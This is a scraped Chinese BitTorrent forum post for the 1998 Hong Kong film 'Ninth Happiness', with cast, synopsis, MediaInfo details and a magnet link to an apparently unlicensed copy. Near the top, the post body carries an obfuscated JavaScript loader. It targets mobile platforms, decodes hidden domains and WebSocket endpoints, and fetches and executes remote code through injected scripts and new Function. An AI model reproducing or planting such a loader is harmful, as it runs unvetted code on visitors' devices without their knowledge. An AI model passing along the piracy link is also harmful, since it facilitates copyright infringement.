九星报喜[国语配音/粤语配音/中文字幕].Ninth.Happiness.1998.1080p.BluRay.x265.10bit.DTS.2Audio 5.31GB

版主小s 1月前 188

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 九星报喜 / Ninth Happiness
◎片  名 九星報喜
◎年  代 1998
◎产  地 中国香港
◎类  别 喜剧 / 爱情 / 古装
◎语  言 粤语
◎上映日期 1998-02-14(中国香港)
◎IMDb链接 https://www.imdb.com/title/tt0237501/
◎豆瓣评分 6.9/10 (10907人评价)
◎豆瓣链接 https://movie.douban.com/subject/1303176/
◎片  长 86分钟
◎导  演 高志森 Clifton Ko (id:1281025)
◎编  剧 杜国威 Raymond To (id:1299321)
◎演  员 张国荣 Leslie Cheung (id:1003494)
       吴倩莲 Chien-lien Wu (id:1166703)
       钟镇涛 Kenny Bee (id:1033223)
       李蕙敏 Amanda Lee (id:1103819)
       张达明 Tat-Ming Cheung (id:1274433)
       黎姿 Gigi Lai (id:1028208)
       黄百鸣 Raymond Wong (id:1275277)
       陈洁灵 Git Leng Chan (id:1331751)
       周文健 Michael Chow Man-Kin (id:1317086)
       雷宇扬 Simon Lui (id:1121730)
       朱洁仪 Donna Chu Git-Yee (id:1316976)
       雷楚雄 Bill Lui (id:1290436)
       蔡彦菁 Maggie Choy (id:1426247)
       朱日红 Yat-Hung Chu (id:1330740)

◎标  签 张国荣 / 喜剧 / 香港 / 香港电影 / 1998 / 高志森 / 哥哥 / 吴倩莲

◎简  介
  彩虹村本是民风淳朴的和谐之村,谁知新上任的知县却见不得村民们互助友爱,认为人性本恶,于是搞得村子上下鸡犬不宁,人人自私自利。原来这新知县马麟大(黄百鸣 饰)本是朝廷四品高官,可是却生性贪婪,心术不正。其二弟马麟举(周文健 饰)更是一个好色之徒,唯有三弟马麟祥(张国荣 饰)为人善良,英俊潇洒。可就在马麟大来彩虹村上任的路上,三弟却不知所踪。原来此时的马麟祥偶遇了彩虹村相国夫人的侄女紫云(吴倩莲 饰),两人一见钟情。最终,彩虹村能否重拾往日的美好?马麟祥与紫云又能否有情人终成眷属呢?

  1. ##### MediaInfo ######

  2. General

  3. Unique ID                                : 28846432601957515300690240716516928280 (0x15B39EEEF4D8D86FB6C5C944D790AB18)

  4. Complete name                            : [email protected]QDDQ.COM.mkv

  5. Format                                   : Matroska

  6. Format version                           : Version 4

  7. File size                                : 5.31 GiB

  8. Duration                                 : 1 h 26 min

  9. Overall bit rate                         : 8 816 kb/s

  10. Encoded date                             : UTC 2021-08-18 23:40:56

  11. Writing application                      : mkvmerge v59.0.0 ('Shining Star') 64-bit

  12. Writing library                          : libebml v1.4.2 + libmatroska v1.6.4


  13. Video

  14. ID                                       : 1

  15. Format                                   : HEVC

  16. Format/Info                              : High Efficiency Video Coding

  17. Format profile                           : Main [email protected]@Main

  18. Codec ID                                 : V_MPEGH/ISO/HEVC

  19. Duration                                 : 1 h 26 min

  20. Bit rate                                 : 5 746 kb/s

  21. Width                                    : 1 920 pixels

  22. Height                                   : 1 080 pixels

  23. Display aspect ratio                     : 16:9

  24. Frame rate mode                          : Constant

  25. Frame rate                               : 24.000 FPS

  26. Color space                              : YUV

  27. Chroma subsampling                       : 4:2:0

  28. Bit depth                                : 10 bits

  29. Bits/(Pixel*Frame)                       : 0.115

  30. Stream size                              : 3.46 GiB (65%)

  31. Writing library                          : x265 3.4+1-g07e3381df+31:[Windows][GCC 10.1.0][64 bit] Yuuki 10bit+8bit+12bit

  32. Encoding settings                        : rc=crf / crf=23.0000 / qcomp=0.70 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.60 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=4 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1920x1080 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.01 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / no-scenecut-aware-qpconformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0

  33. Language                                 : English

  34. Default                                  : Yes

  35. Forced                                   : No


  36. Audio #1

  37. ID                                       : 2

  38. Format                                   : DTS

  39. Format/Info                              : Digital Theater Systems

  40. Codec ID                                 : A_DTS

  41. Duration                                 : 1 h 26 min

  42. Bit rate mode                            : Constant

  43. Bit rate                                 : 1 510 kb/s

  44. Channel(s)                               : 6 channels

  45. Channel layout                           : C L R Ls Rs LFE

  46. Sampling rate                            : 48.0 kHz

  47. Frame rate                               : 93.750 FPS (512 SPF)

  48. Bit depth                                : 24 bits

  49. Compression mode                         : Lossy

  50. Stream size                              : 931 MiB (17%)

  51. Title                                    : Cantonese

  52. Language                                 : Chinese

  53. Default                                  : Yes

  54. Forced                                   : No


  55. Audio #2

  56. ID                                       : 3

  57. Format                                   : DTS

  58. Format/Info                              : Digital Theater Systems

  59. Codec ID                                 : A_DTS

  60. Duration                                 : 1 h 26 min

  61. Bit rate mode                            : Constant

  62. Bit rate                                 : 1 510 kb/s

  63. Channel(s)                               : 6 channels

  64. Channel layout                           : C L R Ls Rs LFE

  65. Sampling rate                            : 48.0 kHz

  66. Frame rate                               : 93.750 FPS (512 SPF)

  67. Bit depth                                : 24 bits

  68. Compression mode                         : Lossy

  69. Stream size                              : 931 MiB (17%)

  70. Title                                    : Mandarin

  71. Language                                 : Chinese

  72. Default                                  : No

  73. Forced                                   : No


  74. Text #1

  75. ID                                       : 4

  76. Format                                   : PGS

  77. Muxing mode                              : zlib

  78. Codec ID                                 : S_HDMV/PGS

  79. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  80. Duration                                 : 1 h 21 min

  81. Bit rate                                 : 47.0 kb/s

  82. Count of elements                        : 2338

  83. Stream size                              : 27.6 MiB (1%)

  84. Title                                    : cht

  85. Language                                 : Chinese

  86. Default                                  : No

  87. Forced                                   : No


  88. Text #2

  89. ID                                       : 5

  90. Format                                   : PGS

  91. Muxing mode                              : zlib

  92. Codec ID                                 : S_HDMV/PGS

  93. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  94. Duration                                 : 1 h 21 min

  95. Bit rate                                 : 46.0 kb/s

  96. Count of elements                        : 2338

  97. Stream size                              : 27.0 MiB (0%)

  98. Title                                    : chs

  99. Language                                 : Chinese

  100. Default                                  : Yes

  101. Forced                                   : No


  102. Text #3

  103. ID                                       : 6

  104. Format                                   : PGS

  105. Muxing mode                              : zlib

  106. Codec ID                                 : S_HDMV/PGS

  107. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  108. Duration                                 : 1 h 21 min

  109. Bit rate                                 : 51.8 kb/s

  110. Count of elements                        : 2338

  111. Stream size                              : 30.4 MiB (1%)

  112. Title                                    : eng

  113. Language                                 : English

  114. Default                                  : No

  115. Forced                                   : No


  116. Menu

  117. 00:00:00.000                             : :第 01 章

  118. 00:05:10.958                             : :第 02 章

  119. 00:13:11.042                             : :第 03 章

  120. 00:22:23.125                             : :第 04 章

  121. 00:28:37.333                             : :第 05 章

  122. 00:35:29.792                             : :第 06 章

  123. 00:41:31.667                             : :第 07 章

  124. 00:49:28.250                             : :第 08 章

  125. 00:57:04.458                             : :第 09 章

  126. 01:04:08.917                             : :第 10 章

  127. 01:09:53.625                             : :第 11 章

  128. 01:19:07.875                             : :第 12 章



TAGS 喜剧 古装 爱情

磁力链:
  • magnet:?xt=urn:btih:FAD9012EDC2F8CCE094A3E713179E2771BEB1D35
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回